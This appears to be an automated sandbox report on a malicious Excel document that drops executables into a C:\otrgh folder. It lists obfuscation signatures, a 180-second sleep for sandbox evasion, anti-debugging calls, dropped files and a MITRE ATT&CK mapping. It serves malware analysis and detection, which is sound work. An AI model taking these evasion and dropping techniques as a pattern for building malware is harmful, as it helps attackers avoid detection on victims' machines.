Source:	Binary string: Dw=helpvolumelabelmasteredudfUDFJOLIETItemPosItemOrder%s (%d).%sData\Program Files\Data\Windows\Program Files\Data\Program Files (x86)\Data\ProgramData\.cdxml.cer.automaticdestinations-ms.cat.dmp.cookie.customdestinations-msWindows\$Windows.~BT\Program Files (x86)\ProgramData\.appxbundle.appxpackageWindows.old\.appx.msip.msm.ocx.olb.mui.nst.etl.fon.dsft.efi.mpb.mp.partial.pdb.p7s.p7x.pfx.pem.pfm.p10.p12.ost.otf.p7m.p7r.p7b.p7c.sys.ttc.spkg.sst.vmrs.vsi.vmcx.psd1.psf.sft.spc.rll.wim.winmd.vsix.wfsWININET.xap\shellL source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: fdcbn.exe, 00000001.00000002.251576617.0000023605D80000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501200537.000001DEF07C0000.00000002.00000001.sdmp
Source:	Binary string: ole32.pdbUGP source: fdcbn.exe, 00000001.00000002.258877953.0000023607860000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508687761.000001DEF2290000.00000002.00000001.sdmp
Source:	Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb(7 source: 9ght3erd[1].exe.0.dr
Source:	Binary string: ole32.pdb source: fdcbn.exe, 00000001.00000002.258877953.0000023607860000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508687761.000001DEF2290000.00000002.00000001.sdmp
Source:	Binary string: advapi32.pdb source: fdcbn.exe, 00000001.00000002.251973477.0000023606110000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.503853339.000001DEF0D10000.00000002.00000001.sdmp
Source:	Binary string: shell32.pdb source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
Source:	Binary string: user32.pdb source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp
Source:	Binary string: crypt32.pdbUGP source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp
Source:	Binary string: advapi32.pdbUGP source: fdcbn.exe, 00000001.00000002.251973477.0000023606110000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.503853339.000001DEF0D10000.00000002.00000001.sdmp
Source:	Binary string: dnsapi.pdb source: fdcbn.exe, 00000001.00000002.251864694.0000023606010000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501906744.000001DEF0A50000.00000002.00000001.sdmp
Source:	Binary string: netapi32.pdb source: fdcbn.exe, 00000001.00000002.251960756.00000236060F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502506717.000001DEF0B10000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: fdcbn.exe, 00000001.00000002.251576617.0000023605D80000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501200537.000001DEF07C0000.00000002.00000001.sdmp
Source:	Binary string: netapi32.pdbUGP source: fdcbn.exe, 00000001.00000002.251960756.00000236060F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502506717.000001DEF0B10000.00000002.00000001.sdmp
Source:	Binary string: kernel32.pdb source: fdcbn.exe, 00000001.00000002.251787155.0000023605F60000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501537228.000001DEF09A0000.00000002.00000001.sdmp
Source:	Binary string: user32.pdbUGP source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp
Source:	Binary string: wininet.pdbUGP source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp
Source:	Binary string: ws2_32.pdbUGP source: fdcbn.exe, 00000001.00000002.252045574.00000236061B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504093786.000001DEF0DB0000.00000002.00000001.sdmp
Source:	Binary string: bcrypt.pdbUGP source: fdcbn.exe, 00000001.00000002.251361547.0000023605B70000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.499969051.000001DEEEC10000.00000002.00000001.sdmp
Source:	Binary string: shell32.pdbUGP source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
Source:	Binary string: crypt32.pdb source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp

Data Obfuscation:

Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BD98E pushfq ; ret	1_2_00007FF7645BD992
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BC349 pushfq ; ret	1_2_00007FF7645BC34A
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BED4B pushfq ; ret	1_2_00007FF7645BED4F
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B2318 pushfq ; ret	1_2_00007FF7645B231C
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B452F pushfq ; ret	1_2_00007FF7645B4533
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B3A07 pushfq ; ret	1_2_00007FF7645B3A0B
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BE607 pushfq ; ret	1_2_00007FF7645BE60B
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B23E1 pushfq ; ret	1_2_00007FF7645B23E5
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BE1E1 pushfq ; ret	1_2_00007FF7645BE1E5
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B4FBB pushfq ; ret	1_2_00007FF7645B4FBF
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B21D0 pushfq ; ret	1_2_00007FF7645B21D4
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B71D4 pushfq ; ret	1_2_00007FF7645B71D5
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B3B97 pushfq ; ret	1_2_00007FF7645B3B9B
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B219C pushfq ; ret	1_2_00007FF7645B21A0
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BE47B pushfq ; ret	1_2_00007FF7645BE47F
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BC68F pushfq ; ret	1_2_00007FF7645BC693
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B705F pushfq ; ret	1_2_00007FF7645B7063
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B4267 pushfq ; ret	1_2_00007FF7645B426B
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BC44D pushfq ; ret	1_2_00007FF7645BC451
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B7219 pushfq ; ret	1_2_00007FF7645B721D
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BDA1E pushfq ; ret	1_2_00007FF7645BDA22
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B242F pushfq ; ret	1_2_00007FF7645B2433
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B20DE pushfq ; ret	1_2_00007FF7645B20E2
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B6EC1 pushfq ; ret	1_2_00007FF7645B6EC5
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B70BB pushfq ; ret	1_2_00007FF7645B70BF
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B3CD1 pushfq ; ret	1_2_00007FF7645B3CD5
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B3ACD pushfq ; ret	1_2_00007FF7645B3AD1
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BDC9A pushfq ; ret	1_2_00007FF7645BDC9E
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B4298 pushfq ; ret	1_2_00007FF7645B42A0
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B26B0 pushfq ; ret	1_2_00007FF7645B26B4

Persistence and Installation Behavior:

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\msdownld.tmp\AS01A87F.tmp\victory.php	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\30ght3erd[1].exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\otrgh\sdgvjk\fdcbn.exe	Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\msdownld.tmp\AS01A87F.tmp\victory.php

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\otrgh\sdgvjk\fdcbn.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exe			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Dropped PE file which has not been started: C:\otrgh\sdgvjk\fdcbn.exe			Jump to dropped file

Source: C:\otrgh\sdgvjk\fdcbn.exe

API coverage: 8.9 %

Source: C:\otrgh\sdgvjk\fdcbn.exe TID: 5328

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: C:\otrgh\sdgvjk\fdcbn.exe

Last function: Thread delayed

Source: fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW0
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW

Anti Debugging:

Source: C:\otrgh\sdgvjk\fdcbn.exe

Code function: 1_2_00007FF764607818 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_00007FF764607818

Source: C:\otrgh\sdgvjk\fdcbn.exe

Code function: 1_2_00007FF7645B8800 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,

1_2_00007FF7645B8800

Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF764603204 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		1_2_00007FF764603204
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF764607818 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_00007FF764607818

HIPS / PFW / Operating System Protection Evasion:

Source: C:\otrgh\sdgvjk\fdcbn.exe

Process created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe'

Jump to behavior

Source: fdcbn.exe, 00000003.00000002.500567052.000001DEEF1D0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp	Binary or memory string: GetProgmanWindow
Source: fdcbn.exe, 00000003.00000002.500567052.000001DEEF1D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: fdcbn.exe, 00000003.00000002.500567052.000001DEEF1D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	Binary or memory string: InitialExpandWindows.HistoryVaultRestoreWindows.closewindowWindows.menubarWindows.selectModeWindows.invertselectionWindows.selectnoneWindows.selectallWindows.pastelinkWindows.pasteWindows.includeinlibraryWindows.burnWindows.emailWindows.newfolderrenamerenamepastelinkpastelinkpropertiespropertieslinklinkpastepastecopycopycutcutdeletedeletemswindowsvideomswindowsmusicmailtohttpshttpbingmaps.zpl.xvid.WPL.wmv.wma.wm.wdp.wav.TTS.TS.rwl.rw2.raw.raf.png.pef.pdf.orf.nrw.nef.mts.mpv2.mpa.mp4v.mp4.mp3.mrw.mov.mod.mkv.m4v.m4r.m4a.m3u.m2ts.m2t.kdc.jxr.jpeg.jpe.jfif.html.htm.gif.flac.erf.epub.dib.crw.cr2.bmp.avi.arw.amr.adts.adt.aac.3gpp.3gp.3g2shcond://v2#ControlPanelExistsshcond://v1#AreAppDefaultsRestrictedshcond://v1#IsIrDASupportedshcond://v1#IsMobilityCenterEnabledshcond://v1#IsParentalControlsAvailableshcond://v1#IsProximityProviderAvailableshcond://v1#COMConditionshcond://v2#IsRemoteDesktopshcond://v2#IsProjectionAvailableshcond://v1#IsAuxDisplayConnectedAndAutoWakeEnabledshcond://v1#IsMuiEnabledshcond://v1#IsGlassOnshcond://v1#IsConnectedToInternetshcond://v1#IsTouchAvailableshcond://v1#IsPenAvailableshcond://v1#IsTabletPCshcond://v1#IsServershcond://v1#SkuEqualsshcond://v1#IsOfflineFilesEnabledshcond://v1#IsBrightnessAvailableshcond://v1#IsPresentationSettingsEnabledshcond://v1#IsMobilePCshcond://v1#IsAuxDisplayConnectedshcond://v1#IsUserAdminshcond://v1#IsMachineNotOnDomainAndDomainIsAvailshcond://v1#IsMachineOnDomainshcond://v1#RegkeyExistsshcond://v1#RegvalExistsshcond://v1#RegvalEqualsRateChartOverlayWindowAutoplayHandlerChooserOperationStatusWindowMenuSiteBaseBarExplorerBrowserControlExplorerBrowserNavigationDateRangeControlBooleanCheckMarkControlIconListControlmsctls_netaddressSysDragImageThumbnailControlPropertyControlBaseShell Preview Extension Temporary ParentShell Preview Extension Host PreviewerShell Preview Extension Host Background MsgCalendarHostDropDownRatingsControlSHELLDLL_MVPEditControlViewControlClassTrackContextMenuClassSharePointViewUserEventWindowGroupButtonShellFileSearchControlATL Shell EmbeddingDivWindowMSGlobalFolderOptionsStubProgmanStubWindow32cpShowColorcpColorWOACnslFontPreviewWOACnslWinPreview\Sharepoint\Dropbox\Google Drive\Onedrive -\3D Objects\Music\Videos\Pictures\Pictures\Camera Roll\Documents\Downloads\DesktopParse Internet Dont Escape SpacesDon't Parse RelativePendingRedirectionSyncRootsUserSyncRoots
Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	Binary or memory string: VerticalScrollBaranimationTileContentsSrcanimationProgressSrcInneranimationProgressDstanimationProgressDstInneranimationTileContentsDstanimationTileContentsSrcInneranimationTileContentsDstInneranimationProgressSrcidOperationTileeltProgressBareltInterruptPaneeltSummaryeltRegularTileHeadereltInterruptDoForAlleltInterruptButtonsContainereltInterruptDescriptioneltItemIconeltInterruptSkipBtneltInterruptCancelBtneltInterruptRetryBtneltInterruptYesBtneltItemNameeltItemPropseltInterruptElevateBtneltInterruptDeleteBtneltInterruptDoForAllLabelidOperationInterruptidTileSubTextshell\shell32\operationstatusmgr.cppeltInterruptOKBtneltInterruptNoBtnConfirmationCheckBoxDoForAllidTileActionIdTileKeepDestIdTileKeepAsWorkIdTileKeepAsPersonalIdTileIgnoreIdTileDecideForEachidItemTileIdTileKeepSourceidTileIconeltConflictInterruptDescriptioneltItemTileContainerKeepSourceTileIconSkipTileIconDecideForEachTileIconCustomCommandIconidConflictInterrupteltInterruptTileHeaderidCustomConflictInterrupteltTimeRemainingeltTile%ueltTileContentseltPauseButtonIdTileDefault%0.2fCHARTVIEWeltRateCharteltCancelButtoneltRegularTileeltScrolleltDetailseltItemsRemainingeltLocationseltConfirmationInterrupteltConflictInterrupteltDisplayModeBtneltDisplayModeBtnFocusHoldereltTileAreaeltProgressBarContainereltDividereltScrollBarFilleridTileHosteltFooterAreaprogmanEnthusiastModeWindows.SystemToast.ExplorerRICHEDIT50WlfItaliclfUnderlinelfStrikeOutlfCharSetSoftware\Microsoft\NotepadlfEscapementlfOrientationlfWeightiPointSizeLucida ConsolelfFaceNamelfOutPrecisionlfClipPrecisionlfQualitylfPitchAndFamily
Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	Binary or memory string: Local\SM0:%d:%d:%hsShell_TrayWnd_p0hCLSID\Software\Classes\RtlDllShutdownInProgressEtwEventWriteEtwEventEnabledEtwEventUnregisterEtwEventRegisterntdll.dllWilStaging_02NtQuerySystemInformationSecurity-SPP-Reserved-TBLProductKeyTypeshell32-license-ShowProductNameOnDesktopSoftware\Microsoft\Windows NT\CurrentVersion\WindowsDisplayVersionBasebrdWldpCheckRetailConfiguration\Registry\Machine\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates\2BD63D28D7BCD0E251195AEB519243C13142EBC3\Registry\Machine\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\2BD63D28D7BCD0E251195AEB519243C13142EBC3BuildLabYOr
Source: fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	Binary or memory string: PROGMANDDEMLMom%c:\%sExplorerDMGFrameGetWorkingDirGetDescriptionProgmanProgmanGetIconsetupPmFrameSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsFoldersGroupsAppPropertiesBWWFrameccInsDDEBACKSCAPEDDEClientWndClassDDEClientStartUpddeClassInstallCA_DDECLASSMake Program Manager GroupMedia RecorderMediaRecorderSender#32770groups
Source: fdcbn.exe, 00000003.00000002.500567052.000001DEEF1D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	Binary or memory string: ConfirmCabinetIDExploreFolderShellFileOpenFindFileViewFolderCreateGroupReplaceItemDeleteItemFindFolderReloadAddItemShowGroupDeleteGroupExitProgman
Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	Binary or memory string: CountryL1WUSF123r5.inidriverRestartCommandsSoftware\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup/LOADSAVEDWINDOWSNonRudeHWNDDesktopWindowAutoColorizationProgram ManagerpszDesktopTitleWLocal\Microsoft-Windows-DesktopBackground
Source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp	Binary or memory string: SetProgmanWindow

Language, Device and Operating System Detection:

Source: C:\otrgh\sdgvjk\fdcbn.exe

Code function: 1_2_00007FF7646038CC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_00007FF7646038CC

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Scripting11	Path Interception	Process Injection12	Masquerading11	Input Capture11	System Time Discovery1	Replication Through Removable Media1	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
